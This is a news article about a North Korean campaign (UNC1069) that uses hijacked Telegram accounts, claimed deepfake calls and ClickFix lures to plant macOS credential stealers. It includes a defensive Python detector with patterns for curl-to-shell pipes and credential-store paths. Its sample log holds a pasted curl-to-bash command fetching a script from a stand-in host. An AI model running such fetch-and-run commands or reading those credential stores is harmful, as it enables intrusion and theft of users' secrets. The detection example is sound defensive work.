**North Korean Hackers Use Deepfake Video Calls to Target Crypto Firms**
In a shocking revelation, Google Cloud's Mandiant Threat Intelligence has exposed a sophisticated hacking campaign by North Korea's financially motivated threat group, UNC1069. The attacks combine social engineering, deepfakes, and macOS malware to target financial technology and cryptocurrency firms with the ultimate goal of stealing cryptocurrency.
**A Hijacked Telegram Profile Sets Off the Attack**
The campaign begins with a hijacked Telegram profile of a cryptocurrency executive who had previously fallen victim to account compromise. The attacker uses this compromised account to send messages to others in the fintech sector, building trust and rapport through what appears to be legitimate communication. Once trust is established, the attacker sends a calendar invite to join a meeting, which seems innocuous enough.
**But There's More to It Than Meets the Eye**
However, this meeting is not what it claims to be. According to Mandiant, one target reported that after joining the call, they were confronted with a deepfake of the cryptocurrency executive. Although researchers have been unable to verify this claim, AI-assisted social engineering scams are a known issue in the cybersecurity world.
**The ClickFix Ruse**
Once the victim joins the meeting, the attacker claims that there's an audio issue and offers to help resolve it. This is where the ClickFix attack comes into play – a technique used by attackers to trick victims into running commands on their machine, which ultimately provides the attackers with access and the ability to run code.
**Access Granted**
With the victim's trust gained, the attacker drops malicious files onto the device, including Waveshaper and Hypercall, two backdoors that allow further control over the system. They then install information stealer malware and a data miner – Deepbreath and CHROMEPUSH – to gain even more control and persistence.
**A Treasure Trove of Credentials**
These malicious tools grant access to:
* Login credentials from Keychain
* Browser data from Chrome, Brave, and Edge
* User data from two different versions of Telegram
* User data from Apple Notes
The attackers now have all the login credentials and passwords they need to gain access to the victims' accounts – either to steal from them or use these accounts for additional social engineering.
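As an added defensive example (not code from the article or from Mandiant's report), the script below shows how the two behaviours described above could be flagged in endpoint process logs: a ClickFix-style command pasted into an interactive terminal, and a process other than the owning application reading the credential and messaging stores listed. The JSON-lines log layout, the process names, the example URL and the macOS store paths are assumptions made for illustration, and the log lines are constructed.

```python
"""Flag ClickFix-style pasted commands and third-party reads of credential
stores in process-execution logs.  Added example: the log format is a
constructed, simplified JSON-lines layout, not a real EDR schema."""
import json
import re

# Command shapes a user is typically talked into pasting into Terminal:
# remote content piped straight into a shell, base64-decoded payloads run
# inline, and AppleScript executed from the command line.
CLICKFIX_PATTERNS = [
    ("remote_script_to_shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b")),
    ("base64_to_shell", re.compile(r"base64\s+(-d|--decode)[^|;]*\|\s*(ba|z)?sh\b")),
    ("inline_osascript", re.compile(r"\bosascript\s+-e\b")),
]

# Only commands launched from an interactive terminal count as ClickFix
# candidates; the same pipe in a CI job or launchd task is ordinary noise.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}

# Stores named in the article, keyed on the macOS directory where they
# live (paths and owning process names are assumed for illustration).
# Reads by the owning application itself are not flagged.
SENSITIVE_STORES = {
    "keychain": ("Library/Keychains/", {"securityd", "security"}),
    "chrome": ("Library/Application Support/Google/Chrome/", {"Google Chrome"}),
    "brave": ("Library/Application Support/BraveSoftware/", {"Brave Browser"}),
    "edge": ("Library/Application Support/Microsoft Edge/", {"Microsoft Edge"}),
    "telegram_desktop": ("Library/Application Support/Telegram Desktop/", {"Telegram"}),
    "telegram_appstore": ("Library/Containers/ru.keepcoder.Telegram/", {"Telegram"}),
    "apple_notes": ("Library/Group Containers/group.com.apple.notes/", {"Notes"}),
}


def classify_command(cmdline):
    """Return the names of ClickFix patterns that match a command line."""
    return [name for name, rx in CLICKFIX_PATTERNS if rx.search(cmdline)]


def touched_stores(process, paths):
    """Return sensitive stores read by a process that is not their owner."""
    hits = []
    for store, (prefix, owners) in SENSITIVE_STORES.items():
        if process in owners:
            continue
        if any(prefix in p for p in paths):
            hits.append(store)
    return hits


def analyse(lines):
    """Parse JSON-lines process events and return a list of findings."""
    findings = []
    for raw in lines:
        ev = json.loads(raw)
        patterns = classify_command(ev.get("cmdline", ""))
        if patterns and ev.get("parent") in INTERACTIVE_PARENTS:
            findings.append({"ts": ev["ts"], "kind": "clickfix_command",
                             "process": ev["process"], "detail": patterns})
        stores = touched_stores(ev["process"], ev.get("files", []))
        if stores:
            findings.append({"ts": ev["ts"], "kind": "credential_store_access",
                             "process": ev["process"], "detail": stores})
    return findings


# Constructed sample log: a pasted "audio fix" one-liner from Terminal, the
# dropped binary reading Keychain, Chrome and Notes data, Chrome reading its
# own data, a benign git command, and a curl|sh pipe from a non-interactive
# parent that should not be flagged.
SAMPLE_LOG = [
    '{"ts":"2025-11-03T14:02:11Z","process":"zsh","parent":"Terminal",'
    '"cmdline":"curl -fsSL https://audio-fix.example/fix.sh | bash","files":[]}',
    '{"ts":"2025-11-03T14:02:40Z","process":"fixaudio","parent":"zsh",'
    '"cmdline":"/tmp/fixaudio","files":['
    '"/Users/alice/Library/Keychains/login.keychain-db",'
    '"/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data",'
    '"/Users/alice/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite"]}',
    '{"ts":"2025-11-03T14:05:02Z","process":"Google Chrome","parent":"launchd",'
    '"cmdline":"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",'
    '"files":["/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"]}',
    '{"ts":"2025-11-03T14:06:30Z","process":"zsh","parent":"Terminal",'
    '"cmdline":"git pull origin main","files":[]}',
    '{"ts":"2025-11-03T14:07:00Z","process":"bash","parent":"launchd",'
    '"cmdline":"curl -s https://ci.example/run.sh | sh","files":[]}',
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(json.dumps(finding))
```

Run against the constructed sample, the script reports two findings: the pasted curl-to-bash command from Terminal, and the dropped binary reading the Keychain, Chrome and Apple Notes stores. Chrome reading its own Login Data and the non-interactive curl|sh pipe are deliberately left unflagged, which is the kind of scoping that keeps a rule like this usable in a real fleet.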
**Mandiant's Verdict**
"The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft," said Mandiant. "This incident was a targeted attack to harvest as much data as possible for a dual purpose: enabling cryptocurrency theft and fuelling future social engineering campaigns by leveraging victim's identity and data."
**A History of Significant Attacks**
State-backed North Korean threat groups have a history of significant cryptocurrency heists and attacks targeting organizations in financial technology. In 2025 alone, North Korea made over $2 billion from attacks targeting cryptocurrency, accounting for over 60% of all cryptocurrency stolen that year.
As the world becomes increasingly digital, it's clear that cybersecurity threats will only continue to evolve and intensify. The sophistication of these North Korean attacks serves as a stark reminder of the importance of robust security measures in today's digital landscape.